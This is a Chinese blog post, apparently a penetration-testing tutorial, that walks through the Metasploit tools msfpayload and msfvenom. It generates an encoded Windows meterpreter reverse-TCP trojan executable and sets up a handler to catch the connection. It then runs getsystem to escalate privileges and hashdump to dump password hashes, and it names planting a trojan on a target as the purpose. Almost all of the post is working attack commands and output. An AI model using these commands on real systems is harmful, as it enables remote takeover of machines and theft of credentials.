注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

Linux顶级渗透精髓--第一课 Metaploit Contrast 2 Attack Type By Msfvenom  

2014-12-10 19:46:03|  分类: web安全渗透 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Metasploit Contrast 2 Attack Type By Msfvenom

msfpayload    payload

msfencode     

msfpayload -l
适用范围:提权或者给目标配置一个木马文件

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=11111 X > test.exe

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LPORT 11111
set LHOST 192.168.40.129

show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.40.129   yes       The listen address
   LPORT     11111            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

exploit

meterpreter>
sysinfo
help
getsystem
hashdump

back

msfencode

msfencode -l

msfvenom 集成了msfpayload和msfencode的特点,具有运行效率快,单一的特点

msfvenom -h

msfvenom -p windows/meterpreter/reverse_tcp -o
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=22222 -b '\x00'
-e x86/shikata_ga_nai -f exe > test2.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 22222
set LHOST 192.168.40.129

exploit

meterpreter>
hashdump
sysinfo
help

background

session -i

session -i id(会话的id)

getsystem
background
back
  评论这张
 
阅读(75)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017